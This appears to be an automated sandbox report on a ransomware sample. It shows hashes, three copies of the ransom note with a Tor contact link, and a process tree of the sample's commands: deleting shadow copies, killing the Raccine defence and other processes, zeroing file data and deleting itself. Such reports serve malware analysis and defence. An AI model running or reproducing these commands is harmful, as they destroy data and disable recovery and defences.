Overview

overview

10

Static

static

10

b256d10ea8...7e.exe

windows7_x64

10

b256d10ea8...7e.exe

windows10_x64

10

Analysis

  • max time kernel
    118s
  • max time network
    118s
  • platform
    windows7_x64
  • resource
    win7-en-20211014
  • submitted
    29-10-2021 12:07

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    b256d10ea8b49cb596fa1dd7b9007b7d03debb3ad05b79c0de45401a82910e7e.exe

  • Size

    130KB

  • MD5

    f4f7a66d40a38fcc1236760b9b7b96e5

  • SHA1

    4ad42999a173ece9885628263ca10d4cd0397e4f

  • SHA256

    b256d10ea8b49cb596fa1dd7b9007b7d03debb3ad05b79c0de45401a82910e7e

  • SHA512

    a4a603384debd1199d2dec6c9cd3e376727de96cb8af73778dc7bd2c0c9f3730f287c1c113001c9c3a2e456ba8229003e1bcdbdccb7a531ded5dcac46a0f3aba

Score
10/10
persistenceransomware

Malware Config

Extracted

Path

C:\Users\Admin\AppData\Local\Temp\RESTORE_FILES_INFO.txt

Ransom Note
YOUR COMPANY WAS HACKED AND COMPROMISED!!! All your important files have been encrypted! Our encryption algorithms are very strong and your files are very well protected, the only way to get your files back is to cooperate with us and get the decrypter program. Do not try to recover your files without a decrypter program, you may damage them and then they will be impossible to recover. ____________________________________________________________________________________ For us this is just business and to prove to you our seriousness, we will decrypt you three files for free. Just open our website, upload the encrypted files and get the decrypted files for free. ____________________________________________________________________________________ ! WARNING ! Whole your network was fully COMPROMISED! We has DOWNLOADED of your PRIVATE SENSITIVE Data, including your Billing info, Insuranse cases, Financial reports, Business audit, Banking Accounts! Also we have corporate correspondence, information about your clients. We got even more info about your partners and even about your staff. Additionally, you must know that your sensitive data has been stolen by our analyst experts and if you choose to no cooperate with us, you are exposing yourself to huge penalties with lawsuits and government if we both don't find an agreement. We have seen it before cases with multi million costs in fines and lawsuits, not to mention the company reputation and losing clients trust and the medias calling non-stop for answers. Come chat with us and you could be surprised on how fast we both can find an agreement without getting this incident public. ____________________________________________________________________________________ IF YOU ARE AN EMPLOYER OF A COMPANY THEN YOU SHOULD KNOW THAT SPREADING SENSITIVE INFORMATION ABOUT YOUR COMPANY BEING COMPROMISED IS A VIOLATION OF CONFIDENTIALITY. YOUR COMPANY'S REPUTATION WILL SUFFER AND SANCTIONS WILL BE TAKEN AGAINST YOU. ____________________________________________________________________________________ WE HIGHLY SUGGEST THAT YOU DON'T CONTACT THE AUTHORITIES REGARDING THIS INCIDENT BECAUSE IF YOU DO, THEN AUTHORITIES WILL MAKE THIS PUBLIC WHICH COMES WITH A COST FOR YOUR ENTERPRISE. THE RECOVERY PROCESS OF YOUR FILES WILL BE FASTER IF YOU COME AND CHAT WITH US EARLY. IF YOU CHOOSE TO COOPERATE, YOU WILL SEE THAT WE ARE PROFESSIONALS WHO GIVES GOOD SUPPORT. Instructions for contacting us: ____________________________________________________________________________________ You have way: 1) Using a TOR browser! a. Download and install TOR browser from this site: https://torproject.org/ b. Open the Tor browser. Copy the link: http://spookuhvfyxzph54ikjfwf2mwmxt572krpom7reyayrmxbkizbvkpaid.onion/chat.php?track=ELUE74884A and paste it in the Tor browser. c. Start a chat and follow the further instructions. Key Identifier: X4ioxEubp3bvu/VmIauj9zXsHn+jZ/kOUNxMik+CVCEQPgI0oG1n7Zh9a4Py5Hi9DVtt+3KfsqxnLN0xDPv0sTCg5DcvLd569dcxUHs59dhFyyz26jPceNBYe3UPgWc6gI2pxJ8Qp3UZAByEewWrLT5lLc9P5LXVbxXqVleiQhyCihrKfznS6XKURFrXuXtZH4jHcC4+QW3G5UeDk/lVvNiFmSVLJQHSnjkn9RD/aY327vpK3STXTPbYF9FJYLxCQjV1m1IqKZNUzJIQwOqpaJYPwa2Iz/z/5cqjX4E0jC0wS5LpCOh9dotTg2JFj0AWo73c3UbfCOO9Xhuq21GxjVFRE8MVXIDqGtAjoX7b5AmbniM60/5THOfoVySlEgPhs+W4tKlAST4DDfslFxH7uakY1Wsow3EkjK2JEPsuRRvpX160h+W1fMyoLqmAY4hLLkBREQ1AIjP8+JPZUQYXnq7CV296EA2Xw7mcFuog+3Mlq7xiGlLDx3Hk4qPiCgugihJoLMNAZBL9imVhGLcuIBkkn5UwCWLo7TpSenYY5PKrsRpp/x/YgbjHqPB28EM++1xkzyngkmx/mfH08TH2rmInglXmyevXgHBv2VsUAtxEPRfauKpcQavV7mVX7aXTtOMIDx6Nrpw63lpx4zmOZCk9BAuM1LJkRC4rvH13Xuo=
URLs

http://spookuhvfyxzph54ikjfwf2mwmxt572krpom7reyayrmxbkizbvkpaid.onion/chat.php?track=ELUE74884A

Extracted

Path

C:\Users\Admin\Desktop\RESTORE_FILES_INFO.txt

Ransom Note
YOUR COMPANY WAS HACKED AND COMPROMISED!!! All your important files have been encrypted! Our encryption algorithms are very strong and your files are very well protected, the only way to get your files back is to cooperate with us and get the decrypter program. Do not try to recover your files without a decrypter program, you may damage them and then they will be impossible to recover. ____________________________________________________________________________________ For us this is just business and to prove to you our seriousness, we will decrypt you three files for free. Just open our website, upload the encrypted files and get the decrypted files for free. ____________________________________________________________________________________ ! WARNING ! Whole your network was fully COMPROMISED! We has DOWNLOADED of your PRIVATE SENSITIVE Data, including your Billing info, Insuranse cases, Financial reports, Business audit, Banking Accounts! Also we have corporate correspondence, information about your clients. We got even more info about your partners and even about your staff. Additionally, you must know that your sensitive data has been stolen by our analyst experts and if you choose to no cooperate with us, you are exposing yourself to huge penalties with lawsuits and government if we both don't find an agreement. We have seen it before cases with multi million costs in fines and lawsuits, not to mention the company reputation and losing clients trust and the medias calling non-stop for answers. Come chat with us and you could be surprised on how fast we both can find an agreement without getting this incident public. ____________________________________________________________________________________ IF YOU ARE AN EMPLOYER OF A COMPANY THEN YOU SHOULD KNOW THAT SPREADING SENSITIVE INFORMATION ABOUT YOUR COMPANY BEING COMPROMISED IS A VIOLATION OF CONFIDENTIALITY. YOUR COMPANY'S REPUTATION WILL SUFFER AND SANCTIONS WILL BE TAKEN AGAINST YOU. ____________________________________________________________________________________ WE HIGHLY SUGGEST THAT YOU DON'T CONTACT THE AUTHORITIES REGARDING THIS INCIDENT BECAUSE IF YOU DO, THEN AUTHORITIES WILL MAKE THIS PUBLIC WHICH COMES WITH A COST FOR YOUR ENTERPRISE. THE RECOVERY PROCESS OF YOUR FILES WILL BE FASTER IF YOU COME AND CHAT WITH US EARLY. IF YOU CHOOSE TO COOPERATE, YOU WILL SEE THAT WE ARE PROFESSIONALS WHO GIVES GOOD SUPPORT. Instructions for contacting us: ____________________________________________________________________________________ You have way: 1) Using a TOR browser! a. Download and install TOR browser from this site: https://torproject.org/ b. Open the Tor browser. Copy the link: http://spookuhvfyxzph54ikjfwf2mwmxt572krpom7reyayrmxbkizbvkpaid.onion/chat.php?track=ELUE74884A and paste it in the Tor browser. c. Start a chat and follow the further instructions. Key Identifier: X4ioxEubp3bvu/VmIauj9zXsHn+jZ/kOUNxMik+CVCEQPgI0oG1n7Zh9a4Py5Hi9DVtt+3KfsqxnLN0xDPv0sTCg5DcvLd569dcxUHs59dhFyyz26jPceNBYe3UPgWc6gI2pxJ8Qp3UZAByEewWrLT5lLc9P5LXVbxXqVleiQhyCihrKfznS6XKURFrXuXtZH4jHcC4+QW3G5UeDk/lVvNiFmSVLJQHSnjkn9RD/aY327vpK3STXTPbYF9FJYLxCQjV1m1IqKZNUzJIQwOqpaJYPwa2Iz/z/5cqjX4E0jC0wS5LpCOh9dotTg2JFj0AWo73c3UbfCOO9Xhuq21GxjVFRE8MVXIDqGtAjoX7b5AmbniM60/5THOfoVySlEgPhs+W4tKlAST4DDfslFxH7uakY1Wsow3EkjK2JEPsuRRvpX160h+W1fMyoLqmAY4hLLkBREQ1AIjP8+JPZUQYXnq7CV296EA2Xw7mcFuog+3Mlq7xiGlLDx3Hk4qPiCgugihJoLMNAZBL9imVhGLcuIBkkn5UwCWLo7TpSenYY5PKrsRpp/x/YgbjHqPB28EM++1xkzyngkmx/mfH08TH2rmInglXmyevXgHBv2VsUAtxEPRfauKpcQavV7mVX7aXTtOMIDx6Nrpw63lpx4zmOZCk9BAuM1LJkRC4rvH13Xuo= Number of files that were processed is: 0
URLs

http://spookuhvfyxzph54ikjfwf2mwmxt572krpom7reyayrmxbkizbvkpaid.onion/chat.php?track=ELUE74884A

Extracted

Path

C:\Users\Admin\Desktop\RESTORE_FILES_INFO.hta

Ransom Note
YOUR COMPANY WAS HACKED AND COMPROMISED!!! All your important files have been encrypted! Our encryption algorithms are very strong and your files are very well protected, the only way to get your files back is to cooperate with us and get the decrypter program. Do not try to recover your files without a decrypter program, you may damage them and then they will be impossible to recover. ____________________________________________________________________________________ For us this is just business and to prove to you our seriousness, we will decrypt you three files for free. Just open our website, upload the encrypted files and get the decrypted files for free. ____________________________________________________________________________________ ! WARNING ! Whole your network was fully COMPROMISED! We has DOWNLOADED of your PRIVATE SENSITIVE Data, including your Billing info, Insuranse cases, Financial reports, Business audit, Banking Accounts! Also we have corporate correspondence, information about your clients. We got even more info about your partners and even about your staff. Additionally, you must know that your sensitive data has been stolen by our analyst experts and if you choose to no cooperate with us, you are exposing yourself to huge penalties with lawsuits and government if we both don't find an agreement. We have seen it before cases with multi million costs in fines and lawsuits, not to mention the company reputation and losing clients trust and the medias calling non-stop for answers. Come chat with us and you could be surprised on how fast we both can find an agreement without getting this incident public. ____________________________________________________________________________________ IF YOU ARE AN EMPLOYER OF A COMPANY THEN YOU SHOULD KNOW THAT SPREADING SENSITIVE INFORMATION ABOUT YOUR COMPANY BEING COMPROMISED IS A VIOLATION OF CONFIDENTIALITY. YOUR COMPANY'S REPUTATION WILL SUFFER AND SANCTIONS WILL BE TAKEN AGAINST YOU. ____________________________________________________________________________________ WE HIGHLY SUGGEST THAT YOU DON'T CONTACT THE AUTHORITIES REGARDING THIS INCIDENT BECAUSE IF YOU DO, THEN AUTHORITIES WILL MAKE THIS PUBLIC WHICH COMES WITH A COST FOR YOUR ENTERPRISE. THE RECOVERY PROCESS OF YOUR FILES WILL BE FASTER IF YOU COME AND CHAT WITH US EARLY. IF YOU CHOOSE TO COOPERATE, YOU WILL SEE THAT WE ARE PROFESSIONALS WHO GIVES GOOD SUPPORT. Instructions for contacting us: ____________________________________________________________________________________ You have way: 1) Using a TOR browser! a. Download and install TOR browser from this site: https://torproject.org/ b. Open the Tor browser. Copy the link: http://spookuhvfyxzph54ikjfwf2mwmxt572krpom7reyayrmxbkizbvkpaid.onion/chat.php?track=ELUE74884A and paste it in the Tor browser. c. Start a chat and follow the further instructions. Key Identifier: X4ioxEubp3bvu/VmIauj9zXsHn+jZ/kOUNxMik+CVCEQPgI0oG1n7Zh9a4Py5Hi9DVtt+3KfsqxnLN0xDPv0sTCg5DcvLd569dcxUHs59dhFyyz26jPceNBYe3UPgWc6gI2pxJ8Qp3UZAByEewWrLT5lLc9P5LXVbxXqVleiQhyCihrKfznS6XKURFrXuXtZH4jHcC4+QW3G5UeDk/lVvNiFmSVLJQHSnjkn9RD/aY327vpK3STXTPbYF9FJYLxCQjV1m1IqKZNUzJIQwOqpaJYPwa2Iz/z/5cqjX4E0jC0wS5LpCOh9dotTg2JFj0AWo73c3UbfCOO9Xhuq21GxjVFRE8MVXIDqGtAjoX7b5AmbniM60/5THOfoVySlEgPhs+W4tKlAST4DDfslFxH7uakY1Wsow3EkjK2JEPsuRRvpX160h+W1fMyoLqmAY4hLLkBREQ1AIjP8+JPZUQYXnq7CV296EA2Xw7mcFuog+3Mlq7xiGlLDx3Hk4qPiCgugihJoLMNAZBL9imVhGLcuIBkkn5UwCWLo7TpSenYY5PKrsRpp/x/YgbjHqPB28EM++1xkzyngkmx/mfH08TH2rmInglXmyevXgHBv2VsUAtxEPRfauKpcQavV7mVX7aXTtOMIDx6Nrpw63lpx4zmOZCk9BAuM1LJkRC4rvH13Xuo= Number of files that were processed is: 0
URLs

http://spookuhvfyxzph54ikjfwf2mwmxt572krpom7reyayrmxbkizbvkpaid.onion/chat.php?track=ELUE74884A

Signatures

  • Deletes itself 1 IoCs
  • Drops startup file 1 IoCs
  • Modifies WinLogon 2 TTPs 2 IoCs
    persistence
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Kills process with taskkill 48 IoCs
    evasion
  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
    adwarespyware
  • Modifies registry key 1 TTPs 1 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 47 IoCs
  • Suspicious use of FindShellTrayWindow 3 IoCs
  • Suspicious use of SendNotifyMessage 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 2 IoCs
    evasion

Processes

  • C:\Users\Admin\AppData\Local\Temp\b256d10ea8b49cb596fa1dd7b9007b7d03debb3ad05b79c0de45401a82910e7e.exe
    "C:\Users\Admin\AppData\Local\Temp\b256d10ea8b49cb596fa1dd7b9007b7d03debb3ad05b79c0de45401a82910e7e.exe"
    1⤵
    • Drops startup file
    • Modifies WinLogon
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    • System policy modification
    PID:1248
    • C:\Windows\SysWOW64\taskkill.exe
      "taskkill" /F /IM RaccineSettings.exe
      2⤵
      • Kills process with taskkill
      • Suspicious use of AdjustPrivilegeToken
      PID:1128
    • C:\Windows\SysWOW64\reg.exe
      "reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F
      2⤵
        PID:756
      • C:\Windows\SysWOW64\reg.exe
        "reg" delete HKCU\Software\Raccine /F
        2⤵
        • Modifies registry key
        PID:1036
      • C:\Windows\SysWOW64\schtasks.exe
        "schtasks" /DELETE /TN "Raccine Rules Updater" /F
        2⤵
          PID:1548
        • C:\Windows\SysWOW64\cmd.exe
          "cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin
          2⤵
            PID:1056
          • C:\Windows\SysWOW64\sc.exe
            "sc.exe" config FDResPub start= auto
            2⤵
              PID:1164
            • C:\Windows\SysWOW64\sc.exe
              "sc.exe" config Dnscache start= auto
              2⤵
                PID:972
              • C:\Windows\SysWOW64\sc.exe
                "sc.exe" config SQLTELEMETRY start= disabled
                2⤵
                  PID:1956
                • C:\Windows\SysWOW64\sc.exe
                  "sc.exe" config SstpSvc start= disabled
                  2⤵
                    PID:572
                  • C:\Windows\SysWOW64\sc.exe
                    "sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
                    2⤵
                      PID:752
                    • C:\Windows\SysWOW64\sc.exe
                      "sc.exe" config SSDPSRV start= auto
                      2⤵
                        PID:1836
                      • C:\Windows\SysWOW64\sc.exe
                        "sc.exe" config upnphost start= auto
                        2⤵
                          PID:888
                        • C:\Windows\SysWOW64\sc.exe
                          "sc.exe" config SQLWriter start= disabled
                          2⤵
                            PID:908
                          • C:\Windows\SysWOW64\taskkill.exe
                            "taskkill.exe" /IM mspub.exe /F
                            2⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1572
                          • C:\Windows\SysWOW64\taskkill.exe
                            "taskkill.exe" /IM synctime.exe /F
                            2⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:568
                          • C:\Windows\SysWOW64\taskkill.exe
                            "taskkill.exe" /IM mspub.exe /F
                            2⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1696
                          • C:\Windows\SysWOW64\taskkill.exe
                            "taskkill.exe" /IM Ntrtscan.exe /F
                            2⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:276
                          • C:\Windows\SysWOW64\taskkill.exe
                            "taskkill.exe" /IM mydesktopqos.exe /F
                            2⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:992
                          • C:\Windows\SysWOW64\taskkill.exe
                            "taskkill.exe" /IM mysqld.exe /F
                            2⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1716
                          • C:\Windows\SysWOW64\taskkill.exe
                            "taskkill.exe" /IM isqlplussvc.exe /F
                            2⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1980
                          • C:\Windows\SysWOW64\taskkill.exe
                            "taskkill.exe" /IM mydesktopservice.exe /F
                            2⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1152
                          • C:\Windows\SysWOW64\taskkill.exe
                            "taskkill.exe" /IM sqbcoreservice.exe /F
                            2⤵
                            • Kills process with taskkill
                            PID:1916
                          • C:\Windows\SysWOW64\taskkill.exe
                            "taskkill.exe" /IM onenote.exe /F
                            2⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1236
                          • C:\Windows\SysWOW64\taskkill.exe
                            "taskkill.exe" /IM firefoxconfig.exe /F
                            2⤵
                            • Kills process with taskkill
                            PID:1800
                          • C:\Windows\SysWOW64\taskkill.exe
                            "taskkill.exe" /IM encsvc.exe /F
                            2⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:952
                          • C:\Windows\SysWOW64\taskkill.exe
                            "taskkill.exe" /IM tbirdconfig.exe /F
                            2⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1884
                          • C:\Windows\SysWOW64\mshta.exe
                            "C:\Windows\System32\mshta.exe" C:\Users\Admin\Desktop\RESTORE_FILES_INFO.hta
                            2⤵
                            • Modifies Internet Explorer settings
                            PID:1792
                          • C:\Windows\SysWOW64\taskkill.exe
                            "taskkill.exe" /IM agntsvc.exe /F
                            2⤵
                            • Kills process with taskkill
                            PID:1648
                          • C:\Windows\SysWOW64\taskkill.exe
                            "taskkill.exe" /IM PccNTMon.exe /F
                            2⤵
                            • Kills process with taskkill
                            PID:1960
                          • C:\Windows\SysWOW64\taskkill.exe
                            "taskkill.exe" /IM dbeng50.exe /F
                            2⤵
                            • Kills process with taskkill
                            PID:1200
                          • C:\Windows\SysWOW64\taskkill.exe
                            "taskkill.exe" /IM excel.exe /F
                            2⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1760
                          • C:\Windows\SysWOW64\taskkill.exe
                            "taskkill.exe" /IM msaccess.exe /F
                            2⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1476
                          • C:\Windows\SysWOW64\taskkill.exe
                            "taskkill.exe" /IM thebat.exe /F
                            2⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1984
                          • C:\Windows\SysWOW64\cmd.exe
                            "cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”
                            2⤵
                              PID:1728
                              • C:\Windows\SysWOW64\PING.EXE
                                ping 127.0.0.7 -n 3
                                3⤵
                                • Runs ping.exe
                                PID:1304
                              • C:\Windows\SysWOW64\fsutil.exe
                                fsutil file setZeroData offset=0 length=524288 “%s”
                                3⤵
                                  PID:752
                              • C:\Windows\SysWOW64\taskkill.exe
                                "taskkill.exe" /IM thebat64.exe /F
                                2⤵
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1896
                              • C:\Windows\SysWOW64\taskkill.exe
                                "taskkill.exe" /IM steam.exe /F
                                2⤵
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:692
                              • C:\Windows\SysWOW64\taskkill.exe
                                "taskkill.exe" /IM outlook.exe /F
                                2⤵
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1496
                              • C:\Windows\SysWOW64\taskkill.exe
                                "taskkill.exe" /IM CNTAoSMgr.exe /F
                                2⤵
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1928
                              • C:\Windows\SysWOW64\taskkill.exe
                                "taskkill.exe" /IM ocomm.exe /F
                                2⤵
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1648
                              • C:\Windows\SysWOW64\taskkill.exe
                                "taskkill.exe" /IM tmlisten.exe /F
                                2⤵
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1980
                              • C:\Windows\SysWOW64\taskkill.exe
                                "taskkill.exe" IM thunderbird.exe /F
                                2⤵
                                • Kills process with taskkill
                                PID:1836
                              • C:\Windows\SysWOW64\taskkill.exe
                                "taskkill.exe" /IM sqlwriter.exe /F
                                2⤵
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:620
                              • C:\Windows\SysWOW64\taskkill.exe
                                "taskkill.exe" /IM dbsnmp.exe /F
                                2⤵
                                • Kills process with taskkill
                                PID:1916
                              • C:\Windows\SysWOW64\taskkill.exe
                                "taskkill.exe" /IM infopath.exe /F
                                2⤵
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1596
                              • C:\Windows\SysWOW64\taskkill.exe
                                "taskkill.exe" /IM msftesql.exe /F
                                2⤵
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:588
                              • C:\Windows\SysWOW64\taskkill.exe
                                "taskkill.exe" /IM wordpad.exe /F
                                2⤵
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1300
                              • C:\Windows\SysWOW64\taskkill.exe
                                "taskkill.exe" /IM xfssvccon.exe /F
                                2⤵
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:756
                              • C:\Windows\SysWOW64\taskkill.exe
                                "taskkill.exe" /IM mbamtray.exe /F
                                2⤵
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1864
                              • C:\Windows\SysWOW64\taskkill.exe
                                "taskkill.exe" /IM powerpnt.exe /F
                                2⤵
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1048
                              • C:\Windows\SysWOW64\taskkill.exe
                                "taskkill.exe" /IM mysqld-opt.exe /F
                                2⤵
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:776
                              • C:\Windows\SysWOW64\taskkill.exe
                                "taskkill.exe" /IM zoolz.exe /F
                                2⤵
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:992
                              • C:\Windows\SysWOW64\taskkill.exe
                                "taskkill.exe" /IM mydesktopqos.exe /F
                                2⤵
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:888
                              • C:\Windows\SysWOW64\taskkill.exe
                                "taskkill.exe" /IM ocautoupds.exe /F
                                2⤵
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1960
                              • C:\Windows\SysWOW64\taskkill.exe
                                "taskkill.exe" /IM visio.exe /F
                                2⤵
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:360
                              • C:\Windows\SysWOW64\taskkill.exe
                                "taskkill.exe" /IM ocssd.exe /F
                                2⤵
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1036
                              • C:\Windows\SysWOW64\taskkill.exe
                                "taskkill.exe" /IM oracle.exe /F
                                2⤵
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1884
                              • C:\Windows\SysWOW64\taskkill.exe
                                "taskkill.exe" /IM mydesktopservice.exe /F
                                2⤵
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:568
                              • C:\Windows\SysWOW64\taskkill.exe
                                "taskkill.exe" /IM sqlagent.exe /F
                                2⤵
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1604
                              • C:\Windows\SysWOW64\taskkill.exe
                                "taskkill.exe" /IM winword.exe /F
                                2⤵
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1364
                              • C:\Windows\SysWOW64\taskkill.exe
                                "taskkill.exe" /IM mysqld-nt.exe /F
                                2⤵
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1548
                              • C:\Windows\SysWOW64\taskkill.exe
                                "taskkill.exe" /IM sqlbrowser.exe /F
                                2⤵
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1992
                              • C:\Windows\SysWOW64\taskkill.exe
                                "taskkill.exe" /IM sqlservr.exe /F
                                2⤵
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1956
                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                "powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }
                                2⤵
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1800
                              • C:\Windows\SysWOW64\cmd.exe
                                "C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\b256d10ea8b49cb596fa1dd7b9007b7d03debb3ad05b79c0de45401a82910e7e.exe
                                2⤵
                                • Deletes itself
                                PID:1912
                                • C:\Windows\SysWOW64\choice.exe
                                  choice /C Y /N /D Y /T 3
                                  3⤵
                                    PID:1520
                              • C:\Windows\system32\conhost.exe
                                \??\C:\Windows\system32\conhost.exe "-5041089151965570159150826624-1153917907-1862808091987190818546473282043183550"
                                1⤵
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1200

                              Network

                              MITRE ATT&CK Enterprise v6

                              Replay Monitor

                              Loading Replay Monitor...

                              Downloads

                              • C:\Users\Admin\Desktop\RESTORE_FILES_INFO.hta
                                MD5

                                b4dcd04781b4a22c92b7a34d342e8304

                                SHA1

                                7d4f6d51efabf67ddff3550b16936cc6dd6a0bf9

                                SHA256

                                70f10095518f74af6617f70b5f1129607a9f6b31224a11a231fb2bae1773155d

                                SHA512

                                2be81f5ce492fb3b1155b0080912cd4d52643776a043b7e204669b234eb6c7a6a7c514591f1ec12bf59ffcd2b6b4d8894dd04e8aa255d4211d68e1860131415f

                                Download Submit

                              • memory/276-74-0x0000000000000000-mapping.dmp

                                Download

                              • memory/360-114-0x0000000000000000-mapping.dmp

                                Download

                              • memory/568-117-0x0000000000000000-mapping.dmp

                                Download

                              • memory/568-73-0x0000000000000000-mapping.dmp

                                Download

                              • memory/572-68-0x0000000000000000-mapping.dmp

                                Download

                              • memory/588-105-0x0000000000000000-mapping.dmp

                                Download

                              • memory/620-102-0x0000000000000000-mapping.dmp

                                Download

                              • memory/692-94-0x0000000000000000-mapping.dmp

                                Download

                              • memory/752-67-0x0000000000000000-mapping.dmp

                                Download

                              • memory/756-108-0x0000000000000000-mapping.dmp

                                Download

                              • memory/756-59-0x0000000000000000-mapping.dmp

                                Download

                              • memory/776-110-0x0000000000000000-mapping.dmp

                                Download

                              • memory/888-70-0x0000000000000000-mapping.dmp

                                Download

                              • memory/888-112-0x0000000000000000-mapping.dmp

                                Download

                              • memory/908-69-0x0000000000000000-mapping.dmp

                                Download

                              • memory/952-82-0x0000000000000000-mapping.dmp

                                Download

                              • memory/972-64-0x0000000000000000-mapping.dmp

                                Download

                              • memory/992-111-0x0000000000000000-mapping.dmp

                                Download

                              • memory/992-75-0x0000000000000000-mapping.dmp

                                Download

                              • memory/1036-115-0x0000000000000000-mapping.dmp

                                Download

                              • memory/1036-60-0x0000000000000000-mapping.dmp

                                Download

                              • memory/1048-109-0x0000000000000000-mapping.dmp

                                Download

                              • memory/1056-62-0x0000000000000000-mapping.dmp

                                Download

                              • memory/1128-58-0x0000000000000000-mapping.dmp

                                Download

                              • memory/1152-78-0x0000000000000000-mapping.dmp

                                Download

                              • memory/1164-63-0x0000000000000000-mapping.dmp

                                Download

                              • memory/1200-87-0x0000000000000000-mapping.dmp

                                Download

                              • memory/1236-81-0x0000000000000000-mapping.dmp

                                Download

                              • memory/1248-55-0x0000000000AB0000-0x0000000000AB1000-memory.dmp

                                Filesize

                                4KB

                                Download

                              • memory/1248-57-0x0000000001FB0000-0x0000000001FB1000-memory.dmp

                                Filesize

                                4KB

                                Download

                              • memory/1300-106-0x0000000000000000-mapping.dmp

                                Download

                              • memory/1304-93-0x0000000000000000-mapping.dmp

                                Download

                              • memory/1364-119-0x0000000000000000-mapping.dmp

                                Download

                              • memory/1476-89-0x0000000000000000-mapping.dmp

                                Download

                              • memory/1496-96-0x0000000000000000-mapping.dmp

                                Download

                              • memory/1548-61-0x0000000000000000-mapping.dmp

                                Download

                              • memory/1548-120-0x0000000000000000-mapping.dmp

                                Download

                              • memory/1572-71-0x0000000000000000-mapping.dmp

                                Download

                              • memory/1596-104-0x0000000000000000-mapping.dmp

                                Download

                              • memory/1604-118-0x0000000000000000-mapping.dmp

                                Download

                              • memory/1648-97-0x0000000000000000-mapping.dmp

                                Download

                              • memory/1648-85-0x0000000000000000-mapping.dmp

                                Download

                              • memory/1696-72-0x0000000000000000-mapping.dmp

                                Download

                              • memory/1716-76-0x0000000000000000-mapping.dmp

                                Download

                              • memory/1728-91-0x0000000000000000-mapping.dmp

                                Download

                              • memory/1760-88-0x0000000000000000-mapping.dmp

                                Download

                              • memory/1792-99-0x0000000074F61000-0x0000000074F63000-memory.dmp

                                Filesize

                                8KB

                                Download

                              • memory/1792-84-0x0000000000000000-mapping.dmp

                                Download

